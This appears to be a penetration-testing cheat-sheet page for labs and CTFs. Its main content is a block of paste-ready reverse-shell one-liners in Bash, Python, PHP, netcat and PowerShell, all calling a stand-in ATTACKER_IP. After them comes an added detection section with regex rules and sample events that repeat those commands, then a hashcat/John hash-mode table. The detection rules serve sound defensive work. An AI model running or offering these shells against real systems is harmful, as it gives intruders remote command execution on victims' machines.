Condensed reference notes on key cybersecurity and networking topics. Use these alongside labs and workbooks for quick lookups during practice.
All scan types, timing templates, NSE scripts, and output formats in one page.
Ordered checklist: SUID, sudo, cron, PATH, kernel exploits, weak permissions.
Bash, Python, PHP, Perl, PowerShell, and netcat reverse shells ready to paste.
Move files between attacker and target: HTTP, SCP, SMB, base64, netcat tricks.
Quick reference: hash format → hashcat -m number. Covers MD5, SHA, NTLM, bcrypt.
Windows, Linux, PHP, Python payloads. Staged vs stageless. Encoding options.
UNION-based, blind boolean, time-based, error-based payloads for MySQL, MSSQL, PostgreSQL.
Reflected, stored, DOM XSS. Filter bypasses, cookie theft, keylogger templates.
A01–A10 with examples, testing approaches, and key mitigations for each category.
Layer-by-layer: protocols, PDUs, devices, and security implications of each layer.
All /prefix values with masks, wildcards, host counts, and block sizes. Print and keep.
Essential show commands, interface config, routing setup, and troubleshooting sequences.
TCP/UDP well-known ports 0–1024 and common higher ports. Essential for exams and CTFs.
Standard vs extended ACLs, wildcard masks, placement rules, and named ACL syntax.
Neighbour states, LSA types, DR/BDR election, area types, and verification commands.
Set up a listener first: `nc -lvnp 4444`

```bash
# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
# Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PHP
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Netcat (with -e)
nc ATTACKER_IP 4444 -e /bin/bash
# Netcat (without -e, pipe trick)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f
# PowerShell (Windows)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Upgrade shell to fully interactive TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then: Ctrl+Z → stty raw -echo; fg → export TERM=xterm
```
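
Detection-side view of the one-liners above, as an added example that is not part of the original cheat sheet: one regex rule per idiom, run over constructed process-creation events. The rule names, the event tuple layout, and the hosts and PIDs are assumptions made for this example.

```python
import re

# One rule per idiom in the cheat sheet above. Rule names are made up for this example.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/\S+/\d+")),
    ("python_socket_dup2", re.compile(r"python[\d.]*\s+-c\b.*socket.*dup2", re.S)),
    ("php_fsockopen_exec",
     re.compile(r"php\s+-r\b.*fsockopen.*\b(exec|system|passthru|shell_exec)\s*\(", re.S)),
    ("netcat_exec_flag",
     re.compile(r"\b(nc|ncat|netcat)\b.*\s-[a-z]*e\s+\S*(sh|cmd(\.exe)?)\b")),
    ("mkfifo_netcat_pipe", re.compile(r"mkfifo\s+\S+.*\|\s*(nc|ncat|netcat)\b")),
    ("powershell_tcpclient_iex",
     re.compile(r"Net\.Sockets\.TCPClient.*\b(iex|Invoke-Expression)\b", re.I | re.S)),
    ("pty_spawn_upgrade", re.compile(r"pty\.spawn\s*\(")),
]

def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """events: iterable of (host, pid, cmdline). Return one alert per matching event."""
    alerts = []
    for host, pid, cmdline in events:
        hits = classify(cmdline)
        if hits:
            alerts.append({"host": host, "pid": pid, "rules": hits})
    return alerts

# Constructed process-creation events; 203.0.113.7 and 192.0.2.10 are documentation addresses.
SAMPLE_EVENTS = [
    ("web01", 4101, "/bin/bash -c 'bash -i >& /dev/tcp/203.0.113.7/4444 0>&1'"),
    ("web01", 4102, "python3 -c 'import socket,subprocess,os;s=socket.socket();"
                    "s.connect((\"203.0.113.7\",4444));os.dup2(s.fileno(),0)'"),
    ("web01", 4103, "php -r '$sock=fsockopen(\"203.0.113.7\",4444);exec(\"/bin/sh -i <&3\");'"),
    ("db02", 5201, "nc 203.0.113.7 4444 -e /bin/bash"),
    ("db02", 5202, "sh -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.7 4444 >/tmp/f'"),
    ("ws03", 6301, "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient("
                   "'203.0.113.7',4444);$sendback = (iex $data 2>&1 | Out-String)\""),
    ("web01", 4104, "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"),
    # Benign look-alikes that must not alert.
    ("ops04", 7401, "nc -zv 192.0.2.10 443"),
    ("ops04", 7402, "rsync -a -e ssh /srv/data backup01:/srv/data"),
    ("ops04", 7403, "python3 -c 'import json,sys;print(json.load(sys.stdin))'"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Command-line rules see only what reaches the process arguments, so pair them with telemetry that links a shell process to an outbound socket.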
| Hash Type | Example | Hashcat -m | John Format |
|---|---|---|---|
| MD5 | 5f4dcc3b5aa765d61d8327deb882cf99 | 0 | raw-md5 |
| SHA-1 | 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 | 100 | raw-sha1 |
| SHA-256 | 5e884898da28047151d0e56f8... | 1400 | raw-sha256 |
| SHA-512 | b109f3bbbc244eb82441917... | 1700 | raw-sha512 |
| NTLM | 31d6cfe0d16ae931b73c59d7e0c089c0 | 1000 | nt |
| MD5crypt ($1$) | $1$salt$hash | 500 | md5crypt |
| SHA-256crypt ($5$) | $5$salt$hash | 7400 | sha256crypt |
| SHA-512crypt ($6$) | $6$salt$hash | 1800 | sha512crypt |
| bcrypt ($2a$) | $2a$12$... | 3200 | bcrypt |
| MySQL4 | *hash | 300 | mysql |